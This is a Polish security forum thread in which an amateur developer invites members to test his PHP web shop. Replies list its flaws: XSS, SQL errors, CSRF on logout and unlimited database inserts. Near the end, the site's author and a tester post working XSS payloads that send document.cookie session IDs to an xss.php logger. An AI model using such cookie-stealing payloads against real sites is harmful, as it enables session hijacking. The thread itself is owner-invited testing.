Testowanie bezpieczeństwa aplikacji internetowej

[coefficient]

Witam. Chciałbym się dowiedzieć od forumowiczów czy byłby ktoś skłonny przetestować aplikację internetową, w głównej mierze pod względem bezpieczeństwa, jak również od strony funkcjonalności. Aplikacja może stanowić podstawę dalszych działań, dlatego teraz pragnąłbym wiedzieć na co zwrócić szczególną uwagę przy projektowaniu.
Jeżeli znaleźliby się ochotnicy, proszę o informację na forum. Wtedy podam adres strony.
W kwestii formalnej, ja jestem autorem tej aplikacji i w razie wątpliwości jestem w stanie umieścić informację na głównej stronie wraz z notą o testowaniu aplikacji i linkiem do tego forum.

Ze wszelkie uwagi z góry dziękuję.

[gogulas]

Dlaczego w pierwszym poscie nie podasz linka? Chetnie bym wszedl przetestowal, ale zeby specjalnie sie teraz z Toba na pw w tym celu kontaktowac to mi sie nie chce..

[TQM]

W wolnej chwili moglbym zajrzec (tylko nie wiem kiedy to bedzie - jak potrzebujesz juz to ja odpadam) ale do tego dochodza wymagania formalne - pisemne upowaznienie do przeprowadzenia testow (wystawione przez wlasciciela serwisu a nie autora strony), potwierdzenie od ISP/hostingu ze wiedza o takich testach itd. Bez zabezpieczenia formalnego znalezienie kogokolwiek powaznego bedzie trudne - nikt nie podlozy swojej glowy pod testy 'na gebe' albo pod cos co zostalo uzgodnione na forum.

Poszukaj prosze tu na forum - pisalem jakie sa zagrozenia i jakie gwarancje sa minimum wymaganym do tego aby cokolwiek prawidlowo zaczac. Bez zadnych formalnych ustalen na pismie mozesz co najwyzej zaprosic ludzi do testowania funkcjonalnosci - wylapywania literowek, popsutych linkow itd. Jesli ktokolwiek z nich zrobi cos nie tak i rozwali serwer to zlamal prawo i przegra w sadzie - po to do testow penetracyjnych wymaga sie takich zabezpieczen formalnych.

[coefficient]

Dlaczego w pierwszym poscie nie podasz linka?

Dlatego, że jeszcze były przeprowadzane pewne zmiany.

... do tego dochodza wymagania formalne - pisemne upowaznienie do przeprowadzenia testow (wystawione przez wlasciciela serwisu a nie autora strony), potwierdzenie od ISP/hostingu ze wiedza o takich testach itd. Bez zabezpieczenia formalnego znalezienie kogokolwiek powaznego bedzie trudne - nikt nie podlozy swojej glowy pod testy 'na gebe' albo pod cos co zostalo uzgodnione na forum.

Ponieważ jest to prosta aplikacji, całkowicie amatorska i niekomercyjna, umieszczona na darmowym hostingu, różnego typu upoważnienia wymagałyby zbyt dużego "zachodu" z mojej strony. Dlatego proszę tylko (w miarę możliwości czasowych) o sprawdzenie funkcjonalności, a ponieważ jest to forum o tematyce bezpieczeństwa, o przetestowanie z uwzględnieniem kwestii bezpieczeństwa.

Nie proszę o przeprowadzenie gruntownego audytu bezpieczeństwa bo nie byłoby to adekwatne do tego typu aplikacji.

W wolnej chwili moglbym zajrzec (tylko nie wiem kiedy to bedzie - jak potrzebujesz juz to ja odpadam)

Tak jak pisałem wcześniej, jest to aplikacja niekomercyjna i stworzona tylko w celach naukowych i może pozostać tak długo, jak będzie rozwijana. Dodatkowo kody stron mogę zostać udostępnione na prośbę użytkowników.

Oto adres: http://www.coefficient.yoyo.pl/

[ironwall]

z tego co ja zauważyłem to chyba zmienna search jest jakoś dziwnie filtrowana bo czasami wyswietla mi znak " nad napisem nic nie znaleziono

[31337]

@tqm
Ty masz jakies zle doswiadczenia z przeszlosci? Nie no, takie podejscie to poprostu tchorzostwo ;/



wiec tak, login.php - zalkowicie zrabales, po co to err? Nie wiem co sie dzieje z post_referer.

naglowek location w http - powinien zawieraz pelny url, od http.

moge zalozyc miliard kat, a skrypt ladnie doda all do bazy.

Użytkownik 'xss' został dopisany do bazy danych, xss. Ponadto wywala backslashe. tak samo po zalogowaniu, gdzie jest tylko 'Witaj'.

cos z baza przy pokaz dane jak w nazwie / hasle bedzie '

pokaz/ukryj dane robi niepotrzebne zapytania, tak samo cala stronka. A wiekszasc to 404 not found.

kontakt - gratz, (dot)/(at) a w hrefie jest caly mail

sesje - tez mozna wygenerowac ile sie chce, ja bym to inaczej rozwiazal.

credential.php nie powinien sie (chyba?) wyswietlac jak sesja jest bledna

logout.php - csrf

cos zchrzaniles z htaccess, jak przekierowjesz pliki php ktorych niema, wywala 502 bad getaway.

automatyczne wykonanie skrpytu przy zakupie, standardowy blad...

backslashe przy komentarzach i zbedne pole dodaj. Ofc nick mozna sobie wybrac, a tam juz jest xss. Wspomnialem ze mozna dodac 300GB komentow?

You have an error in your SQL syntax; - komentarze

po wylogowaniu resetuje sie rachunek


ehh, lepiej nie rob uploadu jak masz zamiar
no i naucz sie php, bo takie bledy to sie popelnia albo jak sie pisze za kase (szybko i chujowo) albo jak sie nie ma pojecia o laczeniu php z sql.

[coefficient]

z tego co ja zauważyłem to chyba zmienna search jest jakoś dziwnie filtrowana bo czasami wyswietla mi znak " nad napisem nic nie znaleziono

Nie potrafię określić czym to jest spowodowane. Mógłbyś podać co wpisałeś?

wiec tak, login.php - zalkowicie zrabales, po co to err? Nie wiem co sie dzieje z post_referer.

Bo takie coś wpadło mi do głowy. Są tego jakieś konsekwencje?
Referer jest po to aby wrócić do strony z produktem w przypadku zakupu lub dodania komentarzu.

naglowek location w http - powinien zawieraz pelny url, od http.

Ma to jakieś znaczenie dla bezpieczeństwa, czy taka jest praktyka?

moge zalozyc miliard kat, a skrypt ladnie doda all do bazy. ...
Wspomnialem ze mozna dodac 300GB komentow?

Jeśli masz taką ochotę, nie widzę przeszkód, jeśli nie przekroczysz limitu danych w bazie. Czy to jest źle?

Użytkownik 'xss' został dopisany do bazy danych, xss. Ponadto wywala backslashe. tak samo po zalogowaniu, gdzie jest tylko 'Witaj'.

cos z baza przy pokaz dane jak w nazwie / hasle bedzie ...
backslashe przy komentarzach

Zgadza się. Nie sprawdziłem, że jest włączona dyrektywa magic_quotes_gpc na serwerze hostingowym.

pokaz/ukryj dane robi niepotrzebne zapytania, tak samo cala stronka. A wiekszasc to 404 not found.

Musi robić zapytanie ponieważ nie wszystko znajduje się w zmiennych sesji. Stąd te odwołania poprzez Ajax.

kontakt - gratz, (dot)/(at) a w hrefie jest caly mail ...
automatyczne wykonanie skrpytu przy zakupie, standardowy blad... ...
zbedne pole dodaj ...
You have an error in your SQL syntax; - komentarze

Niestety tych uwag nie potrafię zrozumieć. Mógłbyś je odrobinę rozjaśnić?

sesje - tez mozna wygenerowac ile sie chce, ja bym to inaczej rozwiazal.

Sesje nie są tworzone na nowo, tylko ich identyfikatory są regenerowane (wtedy kiedy istnieje bieżąca sesja, a użytkownik się loguje).

credential.php nie powinien sie (chyba?) wyswietlac jak sesja jest bledna

Jak najbardziej. Słuszna uwaga.

logout.php - csrf

Prosiłbym o podanie przykładu w jaki sposób można wykorzystać ten typ ataku.

cos zchrzaniles z htaccess, jak przekierowjesz pliki php ktorych niema, wywala 502 bad getaway.

Nie korzystam z htaccess. Jednak nie mam pojęcia dlaczego tak się dzieje. Sprawdziłem inne strony na tej domenie i też się tak dzieje.

Ofc nick mozna sobie wybrac, a tam juz jest xss.

Zgadza się. Duże niedopatrzenie z mojej strony.

po wylogowaniu resetuje sie rachunek

Nie widzę potrzeby aby zachowywać stanu rachunku. Aplikacja jest na tyle prowizoryczna, że nie ma nawet procesu płatności. Poza tym wydaje mi się, że logiczne jest, że po zrealizowaniu zakupów (i w domyśle dokonaniu płatności), klient nie musi płacić dodatkowo za poprzednio zakupione przedmioty.

ehh, lepiej nie rob uploadu jak masz zamiar
no i naucz sie php, bo takie bledy to sie popelnia albo jak sie pisze za kase (szybko i chujowo) albo jak sie nie ma pojecia o laczeniu php z sql.

Dziękuję za uwagi, postaram dostosować się do nich. Proszę również o staranie się unikać nieprzyzwoitych wyrażeń. Nie brzmią i nie wyglądają one najlepiej.

[ironwall]

wpisz w szukajce </script>
ale chyba to nie powoduje zagrożenia dla strony bo próbowałem inne kombinacje i nie działają gdyby działały to co innego bo wtedy można naprzyklad xssa znaleźć albo coś innego ale tak to myślę że niema to większego znaczenia
pozdrawiam

edit..wlasnie zauwazylem ze filtruje wszystkie inne tagi tylko nie </script>

[coefficient]

wpisz w szukajce </script>
ale chyba to nie powoduje zagrożenia dla strony bo próbowałem inne kombinacje i nie działają gdyby działały to co innego bo wtedy można naprzyklad xssa znaleźć albo coś innego ale tak to myślę że niema to większego znaczenia
pozdrawiam

edit..wlasnie zauwazylem ze filtruje wszystkie inne tagi tylko nie </script>

Niby nic a jednak coś powoduje. Proszę wpisać następujący kod

Kod:

</script><script>document.write('<img src="http://coefficient.yoyo.pl/xss.php?PHPSESSID='+document.cookie+'">');alert('OK')</script>

a następnie wejść do pliku xss.txt znajdującego się na serwerze. Tam zobaczycie identyfikatory bieżacych sesji. Dodatkowo można zrobić "obrazek" niewidocznym poprzez zastosowanie stylów i pobrać go z dowolnego serwera. Jutro postaram się to poprawić.
Gratulacje dla ironwall'a. Pozdrawiam.

[ironwall]

troche sie bawiłem tą stroną a dokladnie tym xssem zeby zapisywał gdzies cookiesy no i to nie jest łatwe w tym przypadku przynajmiej dla mnie
ten kod co podałeś to nie działa
ten na dole już prędzej coś robi ale i tak nie zapisuje cookiesów tylko zwykly tekst escape(document.cookie); naprawde dla mnie specyficzna witryna to jest
jak by komuś udało sie napisać taki kodzik znaczy spreferowac zmienną w urlu
to niech napisze bo ciekawy jestem sam jak to powinno wyglądać

Kod:

http://www.coefficient.yoyo.pl/base.php?search=</script><script>document.write("</script><img src=http://www.coefficient.yoyo.pl/xss.php?PHPSESSID=%2Bescape(document.cookie);>");</script>